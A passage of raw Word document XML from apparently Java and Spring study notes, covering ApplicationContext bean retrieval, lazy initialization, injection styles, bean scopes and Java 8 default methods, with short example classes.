    <w:p w14:paraId="5672BDF0" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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Calling Beans Using Spring Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED8412" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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Spring, beans can be accessed or called through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F05EE2" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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pplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the central interface for the Spring IoC container, and it is used to retrieve beans that are defined in the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2474F4B9"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35DD10E9"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pplicationContext context = new ClassPathXmlApplicationContext("beans.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE7ADB"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r car = context.getBean(Car.class);  // Access the Car bean from the context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C16F2" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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Lazy Initialization of Beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A937A1" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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y default, Spring initializes beans eagerly (i.e., at the start of the application). However, you can use lazy initialization to delay the creation of the bean until it is actually required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7DCBF"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326C939C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6783D8"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Scope("singleton")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4039A37A"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azy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E414706"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EAADD"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Bean will be created only when requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FDB986"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5C33055" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A8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4C2200E0"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Spring, beans can be injected and called in a variety of ways, depending on the requirements of your application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F885C9A" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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structor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inject dependencies via the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5567DF" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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tter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inject dependencies via setter methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107EAD62" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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eld Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inject dependencies directly into fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE3422" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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an Scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Define the lifecycle of a bean using singleton, prototype, request, session, application, or WebSocket scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2EAA6" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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itialization and Destruction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @PostConstruct/@PreDestroy or XML configuration methods for bean initialization and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A42A" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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azy Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Delay bean creation until it is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06D280" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A8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se options allow you to fine-tune the behavior of beans and their dependencies based on the specific needs of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24854D36" w14:textId="7D0BDE3B"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1F3B24D">
          <v:rect id="_x0000_i1218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0F27A" w14:textId="3CC761B3" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc196307553"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the default methods</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="5B0E45A6" w14:textId="7FF7EB21" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> were introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow developers to add new functionality to interfaces without breaking the existing implementations of those interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92DC74" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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at are Default Methods?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16201E3E"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default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a method defined in an interface with a body (implementation) provided. Unlike abstract methods in interfaces, default methods can contain concrete (implemented) code. The key point about default methods is that they allow an interface to evolve by adding new methods while still maintaining backward compatibility with classes that implement the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934EAAA" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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yntax of Default Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B7A2A"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default method is declared using the default keyword before the method signature in the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A6124"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interface MyInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD91A5"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Regular abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29529E"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regularMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E532B8D" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BA83E3"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Default method with implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69624FC3"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efault void defaultMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9AE3CC"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This is a default method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002201E6"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3AF808A"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EE2F982" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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Points about Default Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148AF47A" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ault Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method has a body and provides a default implementation in the interface itself. This is different from abstract methods, which don't provide a body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1B6BA" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ackward Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods allow you to add new methods to an existing interface without breaking the classes that already implement that interface. These classes do not need to implement the new method, as it already has a default implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BBF35" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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verriding Default Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a class implementing an interface provides a new implementation for a default method, the default implementation is overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC33297" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ultiple Interface Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a class implements multiple interfaces that contain default methods with the same signature, the class must explicitly override the method to resolve the ambiguity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7898A1" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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t Allowed in Abstract Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods are only allowed in interfaces, not in abstract classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F844729" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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60AAAE3C"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 is an example that demonstrates the use of a default method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB126F"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Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2EEF9C"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bstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB11DC"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drive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D8E4D5" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56CFBD42"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Default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C83E2"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default void honk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C7F6B"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Vehicle honking");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003111B4"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580D418"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A559547" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704CB70E"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Car implements Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17945D"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05A38C6E"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drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F06DD"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ar is driving");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C7413F"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F1EFC8E" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CBB84B"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Optional: Override the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C69CD84"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01FE2A9B"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honk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB53449"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ar honking");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A37BEF"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2D65F23"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50C76FD" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3DA75F"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7A4AAAB8"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1D84526D"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ehicle myCar = new Car();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785AE38E"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Car.drive();  // Output: Car is driving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8B51F"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Car.honk();   // Output: Car honking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A94DE4"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71DDF52"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00D2F2C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D77CE3" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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Vehicle interface has a default method honk() with a default implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DEB208" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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Car class implements Vehicle and provides its own implementation of honk(). This overrides the default implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60C522" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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Car class hadn't overridden honk(), the default implementation from the Vehicle interface would be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77763A" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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y Use Default Methods?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF76D8" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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ackward Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods enable you to add new methods to an interface without breaking existing classes that implement the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F2C42" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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de Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can provide a common behavior (implementation) in the interface itself, avoiding duplication in all implementing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1E07A" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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ultiple Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods enable you to avoid issues when multiple interfaces provide the same default method (although this may need explicit resolution in case of conflicts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D95F0" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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with Conflict Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E0E7F"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wo interfaces have default methods with the same signature, and a class implements both interfaces, the class must override the method to resolve the conflict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF1712"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A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4EDF9"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efault void show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A3A88"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A's show");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55443B69"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5A81A57"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D07445D" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD66592"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B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E037E50"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efault void show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271188AC"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B's show");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4FE81"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8949AC4"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8022D5E" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569332A8"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C implements A, B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B4A1E"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Resolving conflict by overriding the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427611B"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45C4F41E"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public void show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5FC4A"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s show");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C711C"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CCC0AEE"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ACBF214" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D12A3C9"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5F222A89"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3CC6C5C7"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 c = new C();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E2E5F"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show();  // Output: C's show</w:t>
      </w:r>
    </w:p>
